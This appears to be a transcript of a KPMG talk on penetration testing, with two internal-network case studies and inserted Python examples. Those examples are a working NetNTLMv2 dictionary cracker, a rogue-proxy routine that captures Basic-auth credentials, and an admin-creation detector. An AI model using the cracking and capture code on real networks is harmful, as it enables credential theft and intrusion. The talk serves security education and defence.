Security Testing - a requirement for a secure business
Gabriel Mihai Tanase, Director, Cyber Services, KPMG in CEE
Cyber Security Services
ISACA DAY in SOFIA
Agenda
- No agenda
- Some minimum theory
- More real-life examples
Keywords
- Ethical hacking
- Penetration testing
- Pentesting
- Red teaming
- Vulnerability assessment
- Others, as defined by you
Why this talk?
Raise awareness regarding the security risks to our data:
- Most businesses today are based on IT systems
- Critical data is stored on IT systems
- What would happen to my business if this data were stolen or lost?
What are the challenges when trying to protect our data?

Question                                  | Jeweler store                                                  | IT-based business
------------------------------------------|----------------------------------------------------------------|---------------------------------------------------------------------------
Which are my valuable assets?             | Jewels                                                         | Data (client data, intellectual property, payment information, etc.)
Where are my assets?                      | On the shelf                                                   | My servers vs. cloud; in transit; in backup copies; in the DR center; ...?
How do I protect them from being stolen?  | Mechanisms to prevent the thief from leaving with the jewels   | Prevent unauthorized access; encrypt; detect data misuse; prevent exfiltration
What do I do in case of theft?            | Call the police                                                | Call the police? Report to CERT? Private investigation?
How do I know if my data is secure?
- Wait for an attack to happen, or
- Test proactively: simulate an attack
Is my data safe?
How to simulate an attack?
Penetration Testing (a.k.a. pentesting, ethical hacking, red teaming)
- Method for evaluating the security of an information system or network by simulating attacks from malicious outsiders or insiders
- Exploit vulnerabilities and dig much deeper
- Penetration testing is: authorized, adversary-based, ethical (for defensive purposes)
- Penetration testing is not: vulnerability assessment / scanning
(Diagram labels: "Tools find this" on the shallow layer of findings, "Manual tests find this" on the deeper layer)
What is?
Vulnerability Assessment: a vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system.
Penetration Testing: a penetration test is a method of evaluating the computer security of a computer system or network by simulating an attack from malicious outsiders and malicious insiders.
Definitions by Wikipedia
Vulnerability Assessment

Vulnerability Assessment
- Automated tool that finds vulnerabilities in the running application by interacting with it
- Web application scanners
- General vulnerability scanners (OS, databases, services, network)
- Send requests and compare the responses against a database of signatures
- False positives, false negatives
- Must be fine-tuned to produce good results
Example: Vulnerability Assessment (screenshot slide)

Penetration Testing

Penetration Testing
Related terms: penetration testing, pentesting, ethical hacking, tiger teaming, red teaming (BG: ръководители на проникване, literally "penetration managers")
Penetration testing is: authorized, adversary-based, ethical (for defensive purposes)
Penetration testing objectives (examples)
External penetration test:
- Evaluate the security of internet-facing web applications
- Test the security of the internet banking / mobile banking app
- Find vulnerabilities in network perimeter systems
- Access personal data in online medical applications
Internal penetration test:
- Obtain access to the database server containing client information
- Gain domain administrator rights
- Obtain administrative access to the ERP application
- Gain access to company assets (sensitive files, project plans, intellectual property)
Penetration Testing - by example
Threats -> Vulnerabilities -> Assets -> Risks (Vulnerable? Exploitable?)
Threats:
- External attacker: hacker, industrial espionage, organized crime
- Internal attacker: malicious employee, collaborator, consultant, visitor
Vulnerability classes:
- Insufficient input validation
- Insecure session configuration
- Application logic flaws
- Insecure server configuration
Asset: Internet Banking application
Risks (finding and rating):
- SQL injection: H
- OS command execution: H
- Authentication bypass: H
- Cross-site scripting: M
- Directory browsing: M
- Password autocomplete: L
Real Life Examples (screenshot slides)
- Internet Banking Application
- Online Store Application (three slides)
- Website hacked before our pentest
- Arbitrary file download
- Social Engineering Test
- Internal Penetration Test Scenario
- Gaining root access
More examples (photos)
- One of the ATMs hacked by our team during an internal penetration test
- Hardware device created by our team to demonstrate the risk of rounding vulnerabilities in internet banking applications
- VoIP phone hacked during an internal penetration test
Some 0-day examples
EMC Documentum D2 Multiple DQL Injection Vulnerabilities
- EMC Identifier: ESA-2015-108
- CVE Identifier: CVE-2015-0547, CVE-2015-0548
- Credits: EMC would like to thank Ionut Popescu, Security Consultant at KPMG Romania, for reporting CVE-2015-0547 and Ionut Ambrosie, Security Consultant at KPMG Romania, for reporting CVE-2015-0548.
EMC Documentum D2 Cross-Site Scripting Vulnerability
- EMC Identifier: ESA-2015-109
- CVE Identifier: CVE-2015-0549
- Credits: EMC would like to thank Ionut Ambrosie, Security Consultant at KPMG Romania, for reporting this issue.
EMC Documentum WebTop Open Redirect Vulnerability
- ESA Identifier: ESA-2015-123
- CVE Identifier: CVE-2015-4529
- Credits: EMC would like to thank Daniel Tomescu, Security Penetration Tester at KPMG Romania, for reporting this issue.
Penetration testing types
According to the attacker's location:
- External pentest - simulated threats: hackers, corporate espionage, terrorists, organized crime
- Internal pentest - simulated threats: malicious employee, collaborator, consultant, visitor
According to the attacker's initial information:
- Black box test - hackers, organized crime, terrorists, visitors
- Gray box test - consultants, corporate espionage, business partners, regular employees
- White box test - malicious system administrators, developers, consultants
According to the attacks performed:
- Pure technical
- Social engineering
- Denial of service
How? (example graph)
- Information gathering
- Create attack trees
- Prepare tools
- Perform collaborative attacks
- Identify vulnerabilities
- Exploit vulnerabilities
- Extract sensitive data
- Gain system access
- Escalate privileges
- Pivot to other systems
- Write the report
Automated vs. Manual
Automated testing:
- Configure the scanner
- Run the scanner and wait for results
- (Validate findings where possible)
- Deliver the report to the client
Manual testing:
- Use tools as helpers only
- Validate findings by exploitation (no false positives)
- Dig for sensitive data, escalate privileges, gain access to other systems
- Model and simulate real threats: simulate the attacker's way of thinking; consider the attacker's resources, knowledge, culture and motivation
- Several manual tests for the exploitation of specific vulnerabilities
- Strict control, logging, quick feedback
- Interpret the findings according to business impact
Pen test resources
- Dedicated machines
- Dedicated network
- Software tools: in-house developed, open source, commercial
- Dedicated workspace (IT Security Laboratory)
- Protect client data
- Logging facility
Pen test limitations
- Timeframe
- Budget
- Resources
- Personnel awareness
- Things change
- Does not discover all vulnerabilities, but reduces the number of vulnerabilities that could be found by highly skilled attackers with similar resources and knowledge
(Diagram: nested sets - all software vulnerabilities, known vulnerabilities)
Reporting
- Executive summary: overview, key findings, high-level observations, risk matrix
- Technical report: findings, risks, recommendations
- Present the report to the client
Conclusions
- Security is a continuous process
- New vulnerabilities / weaknesses appear every day
- Everyone in the organization is responsible
- There is no bullet-proof solution
- Defense in depth works best
- Be proactive rather than reactive
Case Study 1

Pentesting the internal network (2011)
Objective: see what an internal malicious user could do, given simple physical network access.
Malicious user: visitor, contractor, malicious employee
Targets: confidential data, client information, strategic business plans, etc.
Initial access: physical network port in the users' subnet

1. Network mapping: IP ranges, host names
2. Service and OS discovery: Windows 7, Windows Server 2008 R2; common client ports open; IIS, MS SQL, Exchange, etc.
3. Vulnerability scanning: Nessus: 1 high, 30 medium, 39 low; MS SQL Server default password for the sa user
4. Exploitation: add a local admin
5. Post-exploitation: info gathering; credentials to other systems
6. Pivoting: connect to the 2nd DB server; upload Meterpreter
7. Post-exploitation: list tokens; impersonate the Domain Admin token; create a Domain Admin user. Game over.
(Screenshot: game over on the Domain Controller)
Case Study 2

Pentesting the (same) internal network (2012)
Objective: see what an internal malicious user could do, given simple network access; re-test the findings from the previous year.
Malicious user: visitor, contractor, malicious employee
Targets: confidential data, client information, strategic business plans, etc.
Initial access: network port in the users' subnet

1. Network mapping: about the same as last year
2. Service and OS discovery: about the same as last year
3. Vulnerability scanning: Nessus: 0 high, 21 medium, 30 low
   Now what? No default/weak passwords, no missing patches, no exploitable configuration problems, no SQL injection.
4. Attack the clients - method 1
- Set up a fake local NetBIOS name server that answers every name request with my IP address (NBT-NS poisoning)
- Set up multiple local services (HTTP, SMB) that request Windows authentication on connection => capture password hashes
- Captured around 50 NTLM hashes (NetNTLM challenge/responses: they can be cracked offline or relayed, but unlike the NT hashes stored in AD they cannot be passed-the-hash)
- Cracked about 25% in a few hours using a dictionary attack with mangling rules
- Gained network access as a domain user (low privileges); could access some shared files on the file server
- Not enough
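What "cracked about 25% using a dictionary attack with mangling rules" means in code, as an added example (the deck does not show the team's tooling, and this is not it): the rogue SMB/HTTP listener records NetNTLMv2 challenge/responses, and the cracker recomputes the response for every candidate password until one matches. Everything below is constructed for the example: the captures are generated in the script from invented users, domain and passwords, the wordlist and the mangling rules are a small illustrative set (real rule files run to thousands of rules), and MD4 is implemented inline because hashlib's md4 is missing on many current Python builds.

```python
"""Offline cracking of NetNTLMv2 captures with a dictionary plus mangling rules (added example)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 over the UTF-16LE password."""

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                r = i % 4  # the register being updated cycles a, d, c, b
                if r == 0:
                    a = rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[r])
                elif r == 1:
                    d = rotl((d + fn(a, b, c) + x[k] + const) & MASK, shifts[r])
                elif r == 2:
                    c = rotl((c + fn(d, a, b) + x[k] + const) & MASK, shifts[r])
                else:
                    b = rotl((b + fn(c, d, a) + x[k] + const) & MASK, shifts[r])
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntproof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTLMv2 key, server challenge || blob), where
    NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) || domain in UTF-16LE) (MS-NLMP)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def mangle(word: str):
    """Illustrative mangling rules: case variants combined with common suffixes."""
    for base in (word, word.capitalize(), word.upper()):
        for suffix in ("", "1", "123", "!", "2011", "2012", "2012!"):
            yield base + suffix


def parse_capture(line: str) -> dict:
    """One capture in the user::domain:challenge:proof:blob form (hex fields) that
    Responder-style tools write, the layout hashcat mode 5600 reads."""
    user, rest = line.split("::", 1)
    domain, challenge, proof, blob = rest.split(":", 3)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(lines, wordlist) -> dict:
    """Return {user: password} for each capture reproduced by some mangled dictionary word."""
    found = {}
    for cap in map(parse_capture, lines):
        for candidate in (m for w in wordlist for m in mangle(w)):
            if ntproof(candidate, cap["user"], cap["domain"], cap["challenge"], cap["blob"]) == cap["proof"]:
                found[cap["user"]] = candidate
                break
    return found


def make_capture(user, domain, password, server_challenge: bytes, client_nonce: bytes) -> str:
    """Simulate the victim's client so the script has something to crack (constructed).
    The blob carries the NTLMv2 version bytes, a fixed timestamp and the client nonce;
    a real blob also carries the server's target-info list, which changes nothing here."""
    blob = (struct.pack("<BBHI", 1, 1, 0, 0) + struct.pack("<Q", 0x01CC1D0000000000)
            + client_nonce + b"\x00" * 4 + b"\x00" * 4)
    proof = ntproof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed captures and wordlist; users, domain and passwords are invented.
SAMPLE_CAPTURES = [
    make_capture("jsmith", "CORP", "Winter2012!", bytes.fromhex("1122334455667788"), b"\x11" * 8),
    make_capture("adiaconu", "CORP", "Summer123", bytes.fromhex("8877665544332211"), b"\x22" * 8),
    make_capture("itadmin2", "CORP", "x7#Vq!9pLm2z", bytes.fromhex("0f0e0d0c0b0a0908"), b"\x33" * 8),
]
WORDLIST = ["password", "winter", "summer", "company", "welcome"]

if __name__ == "__main__":
    for user, password in crack(SAMPLE_CAPTURES, WORDLIST).items():
        print(f"{user}: {password}")
```

Two of the three constructed users fall to season-plus-year passwords and the random one survives, which is the shape of the 25% result in the deck: the crack rate is a property of the password policy, not of the capture technique. Because the proof is keyed by the user name, the same password must be recomputed per capture, which is why GPU crackers, not scripts like this, are used at scale.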
4. Attack the clients - method 2
- Man-in-the-middle attack between the victim and the proxy server
- Set up a fake local proxy server that requests Basic authentication
- Receive the user's credentials in clear text (Basic is only base64-encoded, not encrypted)
- The victim sees this: (screenshot of the proxy authentication dialog). What would you do?
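The exchange behind method 2, as an added example that is not the deck's proxy: the browser sends its request to what it believes is the corporate proxy, the rogue proxy answers 407 with a Basic challenge (that is what pops the dialog the victim saw), and the retried request carries the credentials as base64 in a Proxy-Authorization header. The request bytes, realm, host and credentials are all constructed for the example; a real rogue proxy would relay the authenticated request onward so the victim's browsing keeps working, which this function leaves as a comment.

```python
"""The proxy Basic-auth capture of 'method 2' as a pure function over raw HTTP bytes (added example)."""
import base64

REALM = "Corporate Proxy"  # invented; this text appears in the victim's credential dialog


def parse_request(raw: bytes):
    """Split a raw HTTP request into its request line and a lower-cased header dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return request_line, headers


def decode_basic(token: str):
    """Basic credentials are base64("user:password"), not encrypted. Returns None for junk."""
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")  # split at the first colon: passwords may contain ':'
    return (user, password) if sep else None


def challenge_407() -> bytes:
    """The response that makes the browser show the proxy authentication dialog."""
    body = b"Proxy Authentication Required"
    return (b"HTTP/1.1 407 Proxy Authentication Required\r\n"
            + f'Proxy-Authenticate: Basic realm="{REALM}"\r\n'.encode()
            + b"Content-Type: text/plain\r\n"
            + f"Content-Length: {len(body)}\r\n\r\n".encode() + body)


def rogue_proxy(raw_request: bytes):
    """Handle one request: returns (response_to_send, captured_credentials_or_None).
    Anything without valid Basic credentials is answered with the 407 challenge."""
    request_line, headers = parse_request(raw_request)
    scheme, _, token = headers.get("proxy-authorization", "").partition(" ")
    creds = decode_basic(token.strip()) if scheme.lower() == "basic" else None
    if creds is None:
        return challenge_407(), None
    user, password = creds
    # A real rogue proxy now relays the request to the genuine proxy so the victim
    # notices nothing; this example stops once the capture is made.
    return None, {"user": user, "password": password, "request": request_line}


def browser_retry(raw_request: bytes, user: str, password: str) -> bytes:
    """What the browser resends after the victim types credentials into the dialog."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    head, _, body = raw_request.partition(b"\r\n\r\n")
    return head + f"\r\nProxy-Authorization: Basic {token}\r\n\r\n".encode() + body


# Constructed request; the host and the credentials used below are invented.
FIRST_REQUEST = (b"GET http://intranet.example/ HTTP/1.1\r\n"
                 b"Host: intranet.example\r\n"
                 b"User-Agent: Mozilla/5.0 (constructed)\r\n\r\n")


def run_exchange(user: str, password: str):
    """Replay the two-step exchange and return what the attacker captured."""
    response, captured = rogue_proxy(FIRST_REQUEST)
    if captured is not None or not response.startswith(b"HTTP/1.1 407"):
        raise RuntimeError("the first request should have been challenged")
    _, captured = rogue_proxy(browser_retry(FIRST_REQUEST, user, password))
    return captured


if __name__ == "__main__":
    print(run_exchange("CORP\\jsmith", "Winter2012!"))
```

The point the slide makes with "What would you do?" is visible in the code: nothing in the 407 proves who is asking, and the browser hands over the typed credentials to whoever answered. Only a proxy that authenticates with Kerberos or NTLM over a path the attacker cannot sit on, or users trained to treat an unexpected proxy prompt as an incident, changes the outcome.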
5. Exploitation: got the local admin password (the same on every workstation) from a special user; could connect as admin to any workstation
6. Pivoting: searched the machines in the IT subnet for interesting credentials / tokens; found a process running as a domain admin user
7. Exploitation: impersonate the domain admin; create a new domain admin user. Game over.
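Both case studies end at "create a new domain admin user", and case study 1 opens with a new local admin on the SQL server; the deck does not say what the client's monitoring saw either year. As an added example (not from the deck), the check a defender would want is cheap: Windows records the creation as event 4720 and the promotion as 4732 (local group such as Administrators), 4728 (global group such as Domain Admins) or 4756 (universal group such as Enterprise Admins), so a new account that lands in a watched group within minutes of being created is worth an alert on its own. The log extract, hostnames, account names and timestamps are constructed; the "svc_sql" subject on the SQL server is a placeholder, since the deck does not state how the local admin was added.

```python
"""Pair account creation with admin-group membership changes in Windows security events (added example)."""
from datetime import datetime, timedelta

WATCHED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}
GROUP_ADD_EVENTS = (4728, 4732, 4756)  # member added to global / local / universal security group

# Constructed security-log extract (tab separated): time, host, event id, subject account
# (who acted), target account, group or '-'. All names and times are invented.
RAW_LOG = """\
2011-03-11 09:00:00\tDC01\t4720\thr.onboard\tnew.dba\t-
2011-03-14 10:02:11\tSQLSRV01\t4720\tsvc_sql\tsupport2\t-
2011-03-14 10:02:12\tSQLSRV01\t4732\tsvc_sql\tsupport2\tAdministrators
2011-03-14 10:31:05\tDC01\t4720\thelpdesk01\tm.popescu\t-
2011-03-14 10:31:40\tDC01\t4728\thelpdesk01\tm.popescu\tSales
2011-03-14 11:47:52\tDC01\t4720\titadmin3\tbackupsvc2\t-
2011-03-14 11:48:03\tDC01\t4728\titadmin3\tbackupsvc2\tDomain Admins
2011-03-14 15:10:00\tDC01\t4728\titadmin1\tnew.dba\tDomain Admins
"""


def parse_events(text: str):
    """Turn the tab-separated extract into event dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, host, event_id, subject, target, group = line.split("\t")
        events.append({"time": datetime.strptime(when, "%Y-%m-%d %H:%M:%S"), "host": host,
                       "event_id": int(event_id), "subject": subject, "target": target,
                       "group": "" if group == "-" else group})
    return events


def detect_admin_creation(events, window=timedelta(minutes=30)):
    """Alert when an account is created (4720) and within `window` added to a watched group
    on the same host. The window is a tuning knob: new.dba below, created three days before
    its promotion, is deliberately not caught by this rule and needs a separate, noisier one."""
    created = {}  # (host, account) -> the 4720 event
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["target"])
        if ev["event_id"] == 4720:
            created[key] = ev
        elif ev["event_id"] in GROUP_ADD_EVENTS and ev["group"] in WATCHED_GROUPS:
            origin = created.get(key)
            if origin is not None and ev["time"] - origin["time"] <= window:
                alerts.append({"host": ev["host"], "new_admin": ev["target"], "group": ev["group"],
                               "created_by": origin["subject"], "added_by": ev["subject"],
                               "seconds_between": (ev["time"] - origin["time"]).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in detect_admin_creation(parse_events(RAW_LOG)):
        print(alert)
```

On the constructed extract the rule fires twice, for the local admin on SQLSRV01 and the new Domain Admin on DC01, and stays quiet for the helpdesk onboarding into Sales. The "IT personnel vigilance: high" line in the 2012 comparison is what this kind of rule turns into something that does not depend on someone happening to look.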
Lessons learned

Pentest comparison               | 2011   | 2012
---------------------------------|--------|------------------
Low-hanging fruit removed        | no     | yes
IT personnel vigilance           | low    | high
Network prepared for pentest     | no     | yes
Existing vulnerabilities         | yes    | yes (lower number)
Overall exploitation difficulty  | medium | high
Consultant's advice
- Run periodic vulnerability assessments yourselves (e.g. Nessus scans)
- Prepare your network before a pentest (you should always be prepared, by the way)
- A homogeneous network is easier to defend than a heterogeneous one
- Do not give regular users local admin rights
- Patch, patch, patch
- Educate users about security risks
Overall Conclusions - being proactive
- Penetration testing can be used to improve our cyber security
- Do it periodically, with specialized people
- Mandatory for new applications / systems before putting them in production
- Vulnerability assessment (scanning) is not penetration testing
Our clients recommend us
We tested the security of high-profile Romanian and international companies; the feedback received encourages us to continue our high-quality work.
(Client logos, some labelled "as part of KPMG NL team", "as part of KPMG HU team", "CEE", and many more...)
Gabriel Mihai Tanase, Advisory Director, KPMG in CEE, Cyber Security Services - mtanase@kpmg.com
Nikola Nyagolov, Advisory Director, KPMG in Bulgaria - nnyagolov@kpmg.com
Thank you!